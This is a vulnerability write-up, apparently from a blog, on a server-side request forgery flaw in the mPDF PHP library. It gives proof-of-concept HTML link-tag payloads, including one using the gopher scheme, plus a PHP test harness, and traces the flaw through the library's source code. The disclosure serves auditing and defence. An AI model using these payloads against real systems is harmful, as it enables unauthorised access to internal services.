mPDF is a PHP library generating PDF files from UTF-8 encoded HTML as it is explained in the “About” section of the git repository. This is a project with 940 forks and 3.7k stars what makes it interesting to audit. As stated in the title of this chapter, it is possible to perform a SSRF and we will see how and why.

How?

When a PDF is generated from malicious HTML it is possible to perform an SSRF.

Example 1:

<head>
    <link rel="stylesheet" href="http://127.0.0.1:8000/ssrf_via_link_tag">
</head> 
<h1>test 1</h1>

Result:

alt text

Example 2:

<head>
    <link rel="stylesheet" href="gopher://127.0.0.1:8000/xRequest%20sent%20via%20gopher%20scheme%0a%0dThis%20is%20a%20POC.">
</head> 
<h1>test 2</h1>

alt text

The examples are accessible via the links below:

To test the examples at home, place them in the Input folder and use the following PHP code:

<?php

require_once __DIR__ . '/vendor/autoload.php';

$mpdf = new \Mpdf\Mpdf();
$html = file_get_contents("Input/test_0.html");
$mpdf->WriteHTML($html);
$mpdf->Output();

What is interesting is the possibility to use the gopher wrapper as it is shown in example 2. Now let’s look at why the code is vulnerable.

Why?

Let’s go back to our PHP file:

File: test.php

<?php

require_once __DIR__ . '/vendor/autoload.php';

$mpdf = new \Mpdf\Mpdf();
$html = file_get_contents("Input/test_0.html");
$mpdf->WriteHTML($html);
$mpdf->Output();

The call to function Mpdf::WriteHTML() ends up triggering a call to function CssManager::ReadCSS().

File: vendor/mpdf/mpdf/src/Mpdf.php (via Composer) or src/Mpdf.php (via GitHub)


...

/**
 * Write HTML code to the document
 *
 * Also used internally to parse HTML into buffers
 *
 * @param string $html
 * @param int    $mode  Use HTMLParserMode constants. Controls what parts of the $html code is parsed.
 * @param bool   $init  Clears and sets buffers to Top level block etc.
 * @param bool   $close If false leaves buffers etc. in current state, so that it can continue a block etc.
 */
function WriteHTML($html, $mode = HTMLParserMode::DEFAULT_MODE, $init = true, $close = true)
{

    ...

    $html = $this->purify_utf8($html, false);
    if ($init) {
        $this->blklvl = 0;
        $this->lastblocklevelchange = 0;
        $this->blk = [];
        $this->initialiseBlock($this->blk[0]);
        $this->blk[0]['width'] = & $this->pgwidth;
        $this->blk[0]['inner_width'] = & $this->pgwidth;
        $this->blk[0]['blockContext'] = $this->blockContext;
    }

    $zproperties = [];
    if ($mode === HTMLParserMode::DEFAULT_MODE || $mode === HTMLParserMode::HEADER_CSS) {
        $this->ReadMetaTags($html);

        if (preg_match('/<base[^>]*href=["\']([^"\'>]*)["\']/i', $html, $m)) {
            $this->SetBasePath($m[1]);
        }
        $html = $this->cssManager->ReadCSS($html);

...

This function (CssManager::ReadCSS()) will use regex to identify <link> tags as it can be seen:

File: vendor/mpdf/mpdf/src/CssManager.php (via Composer) or src/CssManager.php (via GitHub)


...

public function ReadCSS($html)
{

    ...

    $match = 0; // no match for instance
    $CSSext = [];

    // CSS inside external files
    $regexp = '/<link[^>]*rel=["\']stylesheet["\'][^>]*href=["\']([^>"\']*)["\'].*?>/si';
    $x = preg_match_all($regexp, $html, $cxt);
    if ($x) {
        $match += $x;
        $CSSext = $cxt[1];
    }
    $regexp = '/<link[^>]*href=["\']([^>"\']*)["\'][^>]*?rel=["\']stylesheet["\'].*?>/si';
    $x = preg_match_all($regexp, $html, $cxt);
    if ($x) {
        $match += $x;
        $CSSext = array_merge($CSSext, $cxt[1]);
    }

    ...

    $ind = 0;
    $CSSstr = '';

    if (!is_array($this->cascadeCSS)) {
        $this->cascadeCSS = [];
    }

    while ($match) {

        $path = $CSSext[$ind];

        $path = htmlspecialchars_decode($path); // mPDF 6

        $this->mpdf->GetFullPath($path);

        // mPDF 5.7.3
        if (strpos($path, '//') === false) {
            $path = preg_replace('/\.css\?.*$/', '.css', $path);
        }

        $CSSextblock = $this->assetFetcher->fetchDataFromPath($path);

...

What we are interested in is the line:


...

$CSSextblock = $this->assetFetcher->fetchDataFromPath($path);

...

File: vendor/mpdf/mpdf/src/AssetFetcher.php (via Composer) or src/AssetFetcher.php (via GitHub)


...

public function fetchDataFromPath($path, $originalSrc = null)
{
    /**
     * Prevents insecure PHP object injection through phar:// wrapper
     * @see https://github.com/mpdf/mpdf/issues/949
     * @see https://github.com/mpdf/mpdf/issues/1381
     */
    $wrapperChecker = new StreamWrapperChecker($this->mpdf);

    if ($wrapperChecker->hasBlacklistedStreamWrapper($path)) {
        throw new \Mpdf\Exception\AssetFetchingException('File contains an invalid stream. Only ' . implode(', ', $wrapperChecker->getWhitelistedStreamWrappers()) . ' streams are allowed.');
    }

    if ($originalSrc && $wrapperChecker->hasBlacklistedStreamWrapper($originalSrc)) {
        throw new \Mpdf\Exception\AssetFetchingException('File contains an invalid stream. Only ' . implode(', ', $wrapperChecker->getWhitelistedStreamWrappers()) . ' streams are allowed.');
    }

    $this->mpdf->GetFullPath($path);

    return $this->isPathLocal($path) || ($originalSrc !== null && $this->isPathLocal($originalSrc))
        ? $this->fetchLocalContent($path, $originalSrc)
        : $this->fetchRemoteContent($path);
}

...

As you can see from the comments, only the phar:// wrapper is considered as a dangerous wrapper. So, let’s continue.

File: vendor/mpdf/mpdf/src/File/StreamWrapperChecker.php (via Composer) or src/File/StreamWrapperChecker.php (via GitHub)


...

/**
 * @param string $filename
 * @return bool
 * @since 7.1.8
 */
public function hasBlacklistedStreamWrapper($filename)
{
    if (strpos($filename, '://') > 0) {
        $wrappers = stream_get_wrappers();
        $whitelistStreamWrappers = $this->getWhitelistedStreamWrappers();
        foreach ($wrappers as $wrapper) {
            if (in_array($wrapper, $whitelistStreamWrappers)) {
                continue;
            }

            if (stripos($filename, $wrapper . '://') === 0) {
                return true;
            }
        }
    }

    return false;
}

public function getWhitelistedStreamWrappers()
{
    return array_diff($this->mpdf->whitelistStreamWrappers, ['phar']); // remove 'phar' (security issue)
}

...

What we are interested in is the call to the function AssetFetcher::fetchRemoteContent($path):


...

public function fetchRemoteContent($path)
{
    $data = '';

    try {

        $this->logger->debug(sprintf('Fetching remote content of file "%s"', $path), ['context' => LogContext::REMOTE_CONTENT]);

        /** @var \Mpdf\Http\Response $response */
        $response = $this->http->sendRequest(new Request('GET', $path));

        if ($response->getStatusCode() !== 200) {

            $message = sprintf('Non-OK HTTP response "%s" on fetching remote content "%s" because of an error', $response->getStatusCode(), $path);
            if ($this->mpdf->debug) {
                throw new \Mpdf\MpdfException($message);
            }

            $this->logger->info($message);

            return $data;
        }

        $data = $response->getBody()->getContents();

    } catch (\InvalidArgumentException $e) {
        $message = sprintf('Unable to fetch remote content "%s" because of an error "%s"', $path, $e->getMessage());
        if ($this->mpdf->debug) {
            throw new \Mpdf\MpdfException($message, 0, $e);
        }

        $this->logger->warning($message);
    }

    return $data;
}

...

Which allows us to identify the line responsible for the SSRF:


...

$response = $this->http->sendRequest(new Request('GET', $path));

...

And more precisely the call to the function ClientInterface::sendRequest().

I hope that this short article will have pleased you and will allow you to maybe obtain a shell during an audit via the gopher wrapper, who knows?